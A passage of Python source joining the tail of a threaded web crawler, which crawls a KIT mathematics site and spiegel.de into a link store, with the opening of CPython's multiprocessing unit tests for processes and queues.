self.stop() # ensure crawler is really stopped
def process_website(self, link, website):
logging.debug("Starting to parse %s pending links %d", link, self.pending_links.qsize())
try:
webparser = WebParser(link, website)
except ValueError:
logging.debug("Website %s not parsable, ignored but out link kept", link)
return
web_hash = hash(webparser)
if web_hash in self.already_processed_websites:
# Already processed but with a different url, add this url to node so we know this in the future!
logging.debug("Website %s already processed (with different url)!", link)
node = self.web_net.get_by_content_hash(web_hash)
if node is not None:
node.add_url(link)
return
logging.info("Processed %d.link %s pending websites %d",
self.processed_sites_count + 1, link, self.pending_websites.qsize())
self.already_processed_websites.add(web_hash)
self.processed_sites_count += 1
builder = WebNode.Builder(self.link_constraint)
builder.init_from_webparser(webparser)
webnode = builder.make_node()
self.web_net.add_node(webnode)
for link in webnode.get_out_links():
self.add_link(link)
def process_websites(self, clear_store):
# We are required to open the store in the same thread the store is modified in
logging.info("Starting to process websites")
with WebNodeStore(self.store_path, clear_store) as node_store:
try:
while not self._is_finished():
data = self.pending_websites.get(block=True)
if data is None:
break
link, website = data
self.process_website(link, website)
node_store.save_webnodes(self.web_net.get_nodes())
finally:
self.stop() # ensure crawler is really stopped
def _init_net(self, clear_store):
self.web_net = WebNet()
if not clear_store:
# Do not clear the store but add new nodes to it, load and add existing to webnet
with WebNodeStore(self.store_path, clear=False) as node_store:
for node in node_store.load_webnodes(True):
self.already_processed_websites.add(node.get_content_hash())
for link in node.get_urls():
self.already_processed_links.add(link)
self.web_net.add_node(node)
# After we marked all already processed links, add new outgoings to restart
restart_link_count = 0
total_link_out = 0
for node in self.web_net:
for link in node.get_out_links():
total_link_out += 1
if link not in self.already_processed_links:
self.add_link(link)
restart_link_count += 1
logging.info("Restarting with %d links of %d", restart_link_count, total_link_out)
def _start_async(self, clear_store):
self._init_net(clear_store)
self.links_processor = threading.Thread(target=self.process_links)
self.links_processor.start()
self.websites_processor = threading.Thread(target=Crawler.process_websites, args=[self, clear_store])
self.websites_processor.start()
def join(self):
try:
self.starting_processor.join() # If this stops blocking, the other processors are valid
self.websites_processor.join()
self.links_processor.join()
except KeyboardInterrupt:
self.stop()
def start(self, start_url, clear_store=True):
logging.info("Starting crawling at %s", start_url)
self.is_crawling = True
self.add_link(start_url)
self.starting_processor = threading.Thread(target=Crawler._start_async, args=[self, clear_store])
self.starting_processor.start()
def add_link(self, link):
link = self.link_constraint.get_valid(link)
if link is None:
return
self.pending_links.put(link)
def stop(self):
if self.is_crawling: # Race condition safe (could be executed multiple times)
logging.info("Stopping crawling")
self.is_crawling = False
self.pending_websites.put(None) # Ensure threads do not wait forever and exit
self.pending_links.put(None)
@staticmethod
def download_website(url, timeout):
# Download and read website
logging.debug("Downloading website %s", url)
try:
website = urllib.request.urlopen(url, timeout=timeout).read()
except socket_timeout:
logging.debug("Timeout error when downloading %s", url)
website = None
except urllib.error.HTTPError as err:
if int(err.code / 100) == 4:
logging.debug("Client http error when downloading %s %s", url, err)
website = NotResolvable # 404 Not Found or other Client Error, ignore link in future
else:
logging.debug("HTTP Error when downloading %d %s %s", err.code, url, err)
website = None
except urllib.error.URLError as err:
logging.debug("Url error when downloading %s %s", url, err)
website = None
except RemoteDisconnected as disc:
logging.debug("(RemoteDisconnect) error when downloading %s %s", url, disc)
website = NotResolvable
except UnicodeEncodeError:
logging.debug("(UnicodeEncodeError) error when downloading %s", url)
website = NotResolvable
return website
def crawl_mathy():
# Build constraint that describes which outgoing WebNode links to follow
constraint = LinkConstraint('http', 'www.math.kit.edu')
# Prevent downloading links with these endings
# Frequent candidates: '.png', '.jpg', '.jpeg', '.pdf', '.ico', '.doc', '.txt', '.gz', '.zip', '.tar','.ps',
# '.docx', '.tex', 'gif', '.ppt', '.m', '.mw', '.mp3', '.wav', '.mp4'
forbidden_endings = ['.pdf', '.png', '.ico', '#top'] # for fast exclusion
constraint.add_rule(lambda link: all((not link.lower().endswith(ending) for ending in forbidden_endings)))
# Forbid every point in the last path segment as this likely is a file and we are not interested in it
def rule_no_point_in_last_path_segment(link_parsed):
split = link_parsed.path.split("/")
return len(split) == 0 or "." not in split[-1]
constraint.add_rule(rule_no_point_in_last_path_segment, parsed_link=True)
# Start the crawler from a start domain, optionally loading already existing nodes
from pyoogle.config import DATABASE_PATH
path = DATABASE_PATH
c = Crawler(path, constraint)
c.start("http://www.math.kit.edu", clear_store=False)
# Wait for the crawler to finish
c.join()
webnet = c.web_net
logging.info("DONE, webnet contains %d nodes", len(webnet))
return path, webnet
def crawl_spon():
constraint = LinkConstraint('', 'www.spiegel.de')
# Forbid every point in the last path segment as this likely is a file and we are not interested in it
def rule_no_point_in_last_path_segment(link_parsed):
split = link_parsed.path.split("/")
return len(split) == 0 or ("." not in split[-1] or
split[-1].lower().endswith(".html") or split[-1].lower().endswith(".htm"))
constraint.add_rule(rule_no_point_in_last_path_segment, parsed_link=True)
path = "/home/daniel/PycharmProjects/PageRank/spon.db"
c = Crawler(path, constraint)
c.start("http://www.spiegel.de", clear_store=False)
# Wait for the crawler to finish
c.join()
webnet = c.web_net
logging.info("DONE, webnet contains %d nodes", len(webnet))
return path, webnet
if __name__ == "__main__":
crawl_spon()
|
_test_multiprocessing.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import unittest.mock
import queue as pyqueue
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import subprocess
import struct
import operator
import pickle
import weakref
import warnings
import test.support
import test.support.script_helper
from test import support
from test.support import hashlib_helper
from test.support import import_helper
from test.support import os_helper
from test.support import socket_helper
from test.support import threading_helper
from test.support import warnings_helper
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = import_helper.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
support.skip_if_broken_multiprocessing_synchronize()
import threading
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
from multiprocessing import shared_memory
HAS_SHMEM = True
except ImportError:
HAS_SHMEM = False
try:
import msvcrt
except ImportError:
msvcrt = None
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
# Since multiprocessing.Process has the same API than threading.Thread
# (join() and is_alive(), the support function can be reused
threading_helper.join_thread(process)
if os.name == "posix":
from multiprocessing import resource_tracker
def _resource_unlink(name, rtype):
resource_tracker._CLEANUP_FUNCS[rtype](name)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.monotonic()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.monotonic() - t
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_parent_process_attributes(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
self.assertIsNone(self.parent_process())
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(target=self._test_send_parent_process, args=(wconn,))
p.start()
p.join()
parent_pid, parent_name = rconn.recv()
self.assertEqual(parent_pid, self.current_process().pid)
self.assertEqual(parent_pid, os.getpid())
self.assertEqual(parent_name, self.current_process().name)
@classmethod
def _test_send_parent_process(cls, wconn):
from multiprocessing.process import parent_process
wconn.send([parent_process().pid, parent_process().name])
def test_parent_process(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# Launch a child process. Make it launch a grandchild process. Kill the
# child process and make sure that the grandchild notices the death of
# its parent (a.k.a the child process).
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(
target=self._test_create_grandchild_process, args=(wconn, ))
p.start()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "alive")
p.terminate()
p.join()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "not alive")
@classmethod
def _test_create_grandchild_process(cls, wconn):
p = cls.Process(target=cls._test_report_parent_status, args=(wconn, ))
p.start()
time.sleep(300)
@classmethod
def _test_report_parent_status(cls, wconn):
from multiprocessing.process import parent_process
wconn.send("alive" if parent_process().is_alive() else "not alive")
parent_process().join(timeout=support.SHORT_TIMEOUT)
wconn.send("alive" if parent_process().is_alive() else "not alive")
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@unittest.skipUnless(threading._HAVE_THREAD_NATIVE_ID, "needs native_id")
def test_process_mainthread_native_id(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current_mainthread_native_id = threading.main_thread().native_id
q = self.Queue(1)
p = self.Process(target=self._test_process_mainthread_native_id, args=(q,))
p.start()
child_mainthread_native_id = q.get()
p.join()
close_queue(q)
self.assertNotEqual(current_mainthread_native_id, child_mainthread_native_id)
@classmethod
def _test_process_mainthread_native_id(cls, q):
mainthread_native_id = threading.main_thread().native_id
q.put(mainthread_native_id)
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
def _test_child_fd_inflation(self, evt, q):
q.put(os_helper.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
@classmethod
def _test_wait_for_threads(self, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
setattr(sys, stream_name, None)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
def _sleep_and_set_event(self, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocessing.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
# give time to the fork server to die and time to proc to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = os_helper.TESTFN
self.addCleanup(os_helper.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, encoding="utf-8") as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', encoding="utf-8", closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', encoding="utf-8", closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = os_helper.TESTFN
self.addCleanup(os_helper.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, encoding="utf-8") as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
cases = [
((True,), 1),
((False,), 0),
((8,), 8),
((None,), 0),
((), 0),
]
for args, expected in cases:
with self.subTest(args=args):
p = self.Process(target=sys.exit, args=args)
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, expected)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
close_queue(queue)
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
close_queue(queue)
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
close_queue(queue)
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
close_queue(q)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
close_queue(queue)
def test_no_import_lock_contention(self):
with os_helper.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w', encoding="utf-8") as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with import_helper.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
